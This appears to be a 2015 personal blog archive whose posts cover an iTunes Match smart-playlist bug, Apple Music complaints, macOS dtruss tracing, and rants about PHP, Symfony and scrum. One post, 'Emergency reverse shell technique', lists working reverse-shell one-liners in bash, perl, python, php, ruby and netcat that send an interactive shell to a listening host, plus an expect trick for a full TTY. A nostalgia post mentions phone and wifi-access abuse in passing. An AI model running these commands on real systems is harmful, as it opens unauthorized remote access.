At this point I decided fuck Apple Music in the teeth and wiped it from my devices.  Why they would push artists you don't like or don't know on you
when they have your ENTIRE MUSIC COLLECTION in their cloud is very strange.  Why should I have to select any artists at all?  They KNOW which artists I like
because I BOUGHT THEIR FUCKING MUSIC!

Perhaps they couldn't get those artists, the artists I actually like, to sign up to the service.  In which case they should be smart enough to tell me
upfront "Hey Mark, we don't have any of the artists you like in Apple Music at the moment, still want to continue?"

If they'd done that, and not rolled out an absolutely ridiculous UI, I'd just be mildly disappointed rather than actually angry.

Apple Music is not worthy of the Apple brand.

Smart playlists are too smart for iTunes Match

30 Jun 2015 21:07

This has been driving me nuts for months and I finally figured it out - smart playlists break iTunes Match.

I have a smart playlist simply called "Music" which is configured as:

Match all of:
 - Media kind is "Music"
 - Genre is not "Audiobooks"
No limit
No "match only ticked items"
Live updating enabled

This is intended to always contain all my songs and for the most part it does exactly that.  However, after restoring my iPhone 5S,
enabling iTunes Match and attempting to download this playlist (i.e. all my music) it starts to download the songs but then starts
adding hundreds of my deleted songs back into iTunes, and thus back into the smart playlist itself.

My previous workaround was to simply disable iTunes Match, sync the songs manually from my mac and then re-enable it again, but if you're
doing that you have to wonder what the point of paying for the service is.

Anyway, today whilst installing the 8.4 release I finally made some progress and figured out that it's something to do with the smart
playlist.  If I put all my (non-deleted) music into a regular playlist and download that right after a restore, it works exactly as it
should.  So it seems that there's some kind of bug in the way smart playlists are handled - they work fine for the most part until you
try to download an entire one on an iDevice.

What's also interesting is that when this starts happening, if I turn off the iPhone it stops straight away, no more deleted songs will
appear in iTunes so it seems to be specific to some API that the iPhone is calling in order to download all the songs.

My best guess is that the API the iPhone calls in order to determine which tracks are in a smart playlist doesn't by default exclude
songs that have been previously deleted.  As it's then downloading all the deleted songs on the iPhone, iTunes Match interprets this as a willful
re-download of the song by me and then undeletes it.

Unfortunately there isn't an obvious way I can see to configure the smart playlist to explicitly exclude deleted songs.  It has an "iCloud
Status" field, but it's not possible to have a multi-part OR condition alongside two other AND conditions so I can't really do it.  I think
what you'd need is:

Media kind is "Music" AND Genre is not "Audiobooks" AND ( iCloud Status is "Matched" or iCloud Status is "Uploaded" or iCloud Status is "Purchased" )

Of course the best solution would be for Apple to just fix their broken API.  I've submitted this as bug report #21617107, fingers crossed
someone will pick it up and fix it.  Until then I'll have to stick to a dumb playlist for my "all music" list.

I miss the old days

19 Jun 2015 07:29

I often look back to 1999-ish and miss the fun that we used to have on the internet around then.
Back when memory corruption was trivial and commonplace, when Windows was so insecure that you
could idly amuse yourself by browsing random people's personal files using nothing but the start
menu and when irc networks were an interesting mix of warzone and playground.

So much has moved on since then but it's interesting to note the things that haven't.  Red-boxing
was a thing for a while, and it may surprise many to know that it's still possible, at least in the
UK.  I guess with the advent of mobile phones, the minuscule loss from the few people who both know
how to do it and actually bother just isn't worth doing anything about.

In the same vein, it's interesting that every single commercial wifi service
I've ever connected to has allowed all DNS traffic pre-auth.  Of course very few people would
have a clue that this can be easily exploited to steal access, and even fewer of those would
actually do it, but it still strikes me as odd that such an obvious flaw persists in (I'm guessing)
nearly all of them - especially when it would be so easy to fix.

I was amazed and very amused to discover the other day that the powertech smurf amplifier registry
is still online and still reports several broken networks, some with dupes approaching 40.  I
guess some things just don't change.. shit's always gonna be broken.

strace for mac

18 Jun 2015 08:55

strace is really useful on Linux for figuring out why some program isn't doing what it should.

Not sure how many people know this but you can do the same thing on darwin using dtruss, it's just not quite
so obvious.  Using this script:

https://github.com/m4rkw/env/blob/master/bin/strace.bin

with an alias that always runs it as sudo:

alias strace="sudo strace"

you can then strace <binary> in exactly the same way that you can on linux.  One mild
annoyance is that it has to run as root, which is why the script contains a bit of sudo
hoop-jumping and exploit mitigation.  It's very handy for watching the system calls when
you need to though.
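
If you'd rather skip the wrapper, dtruss can also be invoked directly; the usual
incantations look something like this:

sudo dtruss ls          # trace a new process from the start
sudo dtruss -f ls       # ...and follow any children it spawns
sudo dtruss -p 1234     # attach to an already-running pid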

Emergency reverse shell technique

18 Jun 2015 08:44

Don't you just hate it when an emergency happens with an important server and access from your location is
firewalled?  Luckily if there's someone else local to the machine who can execute commands for you, getting
onto it is fairly trivial.

First make sure that the machine you're on can accept connections from the internet on a TCP port (any).
Typically you'll need to map this through on whatever firewall/router you've got on the local network.

Let's say your ip address is 127.127.127.127 and you've mapped tcp port 13131.  Simply listen on the port
with netcat:

$ nc -l 13131

then have someone on the remote machine run any of these:

bash:

bash -i >& /dev/tcp/127.127.127.127/13131 0>&1

perl:

perl -e 'use Socket;$i="127.127.127.127";$p=13131;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.127.127.127",13131));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

php:

php -r '$sock=fsockopen("127.127.127.127",13131);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby:

ruby -rsocket -e'f=TCPSocket.open("127.127.127.127",13131).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'

netcat:

nc -e /bin/bash 127.127.127.127 13131

and hey presto, your netcat listener is now connected to the shell. Of course the connection isn't
encrypted, so you'll want to be careful what you type over it, but for emergency use it's quite handy. The
advantage over the obvious choice for this (ssh) is that you don't have to give the person who's at the
server end any credentials to log into your machine with in order to set up the connection.

source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

<strong>Update</strong>

One limitation of this is that you won't have a tty, which makes many things impossible or difficult.

However if expect is installed you can get one by dropping this into a file and running it:

#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn bash
interact

then you have a full tty and can run sudo, su, screen etc :)

Symfony 2 is kind of ok

18 Jun 2015 08:04

As PHP frameworks go, Symfony 2 isn't entirely terrible.  Before this project it had been a while since I used Symfony, and back then it was still on
version 1.something.  These days it's kinda cool, allows easy use of popular design patterns and doctrine works reasonably well.

There are some things I find frustrating though; often you spend more time messing around with the YAML definitions of entities
than it would take to simply write a create statement in SQL.  There are times when it's really handy though, for instance our
project hasn't had its first release yet so we can simply doctrine:migrations:diff to regenerate the base migration completely
automatically from the YAML definitions.  This is really cool - I worked on a Yii project for years where this was an entirely
manual process.

I'm not really a fan of writing getters and setters on PHP models, I understand why some people argue it's good practice and
Symfony kind of makes you do it, but it still feels like a lot of busywork.  In fact that's my biggest complaint about Symfony -
for all the niceties and abstracted stuff it gives you, you still end up doing a lot of pointless typing.  And I really REALLY
hate annotations.  Whoever decided that text in a comment should affect how something works ought to be shot for the good of
mankind.

Symfony 2 is one of the best turd-polishing efforts I've experienced.  In the context of PHP development it's a very nicely
polished turd and one of the least painful frameworks to get things done with.  But no matter how much you polish a turd, it's
still a turd and PHP is a fucking turd.

PHP just sucks and there's no getting around it

15 Jun 2015 11:12

There are many reasons why PHP is a shit programming language, many of which are discussed at length in this article:

http://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/

But the main thing that bugs me is how inelegant it is.  You can get things done with it sure, and you can do good work in
almost any language, but that doesn't mean other languages aren't inherently nicer.  Take for example my "usify" script which
I use to automatically derive use statements for Symfony2 classes.  This is the PHP version:

https://github.com/m4rkw/env/blob/master/bin/usify.bak

And here is the ruby rewrite:

https://github.com/m4rkw/env/blob/master/bin/usify

I haven't even refactored it to really take advantage of ruby's features yet and it's still 76 lines shorter after a straight rewrite, and the code is much cleaner, easier to read
and more expressive.  PHP just feels like you're constantly kicking a dead whale along a beach.

It seems that the old adage holds true - "If you could reason with PHP developers there wouldn't BE any PHP developers."

Why agile and especially scrum are terrible

15 Jun 2015 08:20

This is an awesome article:

https://michaelochurch.wordpress.com/2015/06/06/why-agile-and-especially-scrum-are-terrible/

I've been in this situation before when "agile" processes were strewn like cancer throughout a project I really cared about, with
depressing results.  As with any system of processes it's not the process itself that's inherently toxic, but the way it's implemented.
I think it's possible to use scrum as a tool for oversight without demoralising talented developers, it just seems rare that it's done
well.

I strongly suspect that in many cases scrum is promoted as a way to justify certain expensive management roles that would otherwise simply not
need to exist in an engineer-driven culture.

How the hell did dogs survive the evolutionary race?

14 Jun 2015 20:57

I really can't figure it out.  Our 3-month-old miniature schnauzer will eat literally anything she finds on the ground.  How that offers some kind
of evolutionary advantage I'll never know.  I guess when they were evolving there was a lot less man-made rubbish lying around on the ground, but still you'd
expect at least *some* attempt to be careful.  I know apes are careful - the first time they try a new food they place it slowly in their mouth and then
pause for a moment to decide whether to eat it or spit it out.  Our little Poppy would merrily chomp down on whatever she finds lying around on the street
if we gave her the chance.

She is cute though :)

https://m4.rkw.io/img/IMG_1052_2.JPG